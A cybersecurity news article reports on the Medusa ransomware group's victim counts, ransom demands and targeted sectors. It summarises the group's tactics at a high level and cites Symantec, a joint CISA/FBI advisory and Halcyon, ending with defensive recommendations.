The threat actors behind the Medusa ransomware have claimed nearly 400 victims since it first emerged in January 2023, with the financially motivated attacks witnessing a 42% increase between 2023 and 2024.
In the first two months of 2025 alone, the group has claimed over 40 attacks, according to data from the Symantec Threat Hunter Team shared with The Hacker News. The cybersecurity company is tracking the cluster under the name Spearwing.
"Like the majority of ransomware operators, Spearwing and its affiliates carry out double extortion attacks, stealing victims' data before encrypting networks in order to increase the pressure on victims to pay a ransom," Symantec noted.
"If victims refuse to pay, the group threatens to publish the stolen data on their data leaks site."
While other ransomware-as-a-service (RaaS) players like RansomHub (aka Greenbottle and Cyclops), Play (aka Balloonfly), and Qilin (aka Agenda, Stinkbug, and Water Galura) have benefited from the disruptions of LockBit and BlackCat, the spike in Medusa infections raises the possibility that the threat actor could also be rushing in to fill the gap left by the two prolific extortionists.
The development comes as the ransomware landscape continues to be in a state of flux, with a steady stream of new RaaS operations, such as Anubis, CipherLocker, Core, Dange, LCRYX, Loches, Vgod, and Xelera, emerging in the wild in recent months.
Medusa has a track record of demanding ransoms anywhere between $100,000 up to $15 million from targeting healthcare providers and non-profits, as well as financial and government organizations.
Attack chains mounted by the ransomware syndicate involve the exploitation of known security flaws in public-facing applications, mainly Microsoft Exchange Server, to obtain initial access. It's also suspected that the threat actors are likely using initial access brokers for breaching networks of interest.
Once gaining a successful foothold, the hackers drop use remote management and monitoring (RMM) software such as SimpleHelp, AnyDesk, or MeshAgent for persistent access, and employ the tried-and-tested Bring Your Own Vulnerable Driver (BYOVD) technique to terminate antivirus processes using KillAV. It's worth pointing out that KillAV has been previously put to use in BlackCat ransomware attacks.
"The use of the legitimate RMM software PDQ Deploy is another hallmark of Medusa ransomware attacks," Symantec said. "It is typically used by the attackers to drop other tools and files and to move laterally across the victim network."
Some of the other tools deployed over the course of a Medusa ransomware attack include Navicat to access and run database queries, RoboCopy, and Rclone for data exfiltration.
"Like most targeted ransomware groups, Spearwing tends to attack large organizations across a range of sectors," Symantec said. "Ransomware groups tend to be driven purely by profit, and not by any ideological or moral considerations."
CISA Releases Medusa Advisory
In a joint cybersecurity bulletin released on March 12, 2025, the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) noted that Medusa actors have claimed over 300 victims from critical infrastructure sectors as of December 2024.
Impacted industries include medical, education, legal, insurance, technology, and manufacturing. Medusa, the FBI added, is unrelated to the MedusaLocker variant and the Medusa mobile malware variant.
According to the agencies, the RaaS operation was first identified in June 2021, initially as a closed ransomware variant before switching to an affiliate-based model by recruiting outside members to conduct the double extortion attacks. However, crucial aspects such as ransom negotiation are said to be still overseen by the developers.
"Medusa actors use common techniques like phishing campaigns and exploiting unpatched software vulnerabilities," the alert said. The exploited flaws relate to ConnectWise ScreenConnect (CVE-2024-1709) and Fortinet EMS (CVE-2023-48788).
The threat actors have been observed using legitimate tools like Advanced IP Scanner, SoftPerfect Network Scanner, and remote access software, as well as other living-off-the-land (LotL) techniques, to perform reconnaissance, discovery, and lateral movement activities. The attacks are also characterized by various steps to evade detection -
- Deleting PowerShell command line history
- Using tunneling tools to kill or delete endpoint detection and response (EDR) tools
- Using tunneling tools like Ligolo and Cloudflared to support command-and-control (C2)
"After paying the ransom, one victim was contacted by a separate Medusa actor who claimed the negotiator had stolen the ransom amount already paid and requested half of the payment be made again to provide the 'true decryptor' – potentially indicating a triple extortion scheme," per the bulletin.
According to anti-ransomware and cyber resilience platform Halcyon, Medusa has emerged as one of the key frontrunners during the fourth quarter of 2024. The company also described it as a consistent threat group that has intensified its ransomware campaigns late in the year.
"Once inside a network, Medusa employs sophisticated strategies to maximize impact," Jon Miller, CEO and co-founder of Halcyon, said in a statement shared with The Hacker News. "The group executes Base64-encrypted commands via PowerShell to avoid detection and utilizes tools like Mimikatz to extract credentials from memory, facilitating further network compromise."
"They also leverage legitimate remote access software, including AnyDesk and ConnectWise, as well as tools like PsExec and RDP, to propagate across the network. The ransomware can terminate over 200 Windows services and processes, including those related to security software, to facilitate encryption."
To avoid falling victim to Medusa, organizations are recommended to store multiple copies of sensitive and/or proprietary data in an air-gapped location, enforce network segmentation to prevent lateral movement, implement multi-factor authentication, and keep software and systems up-to-date.
(The story was updated after publication to include details of a CISA advisory about Medusa ransomware.)
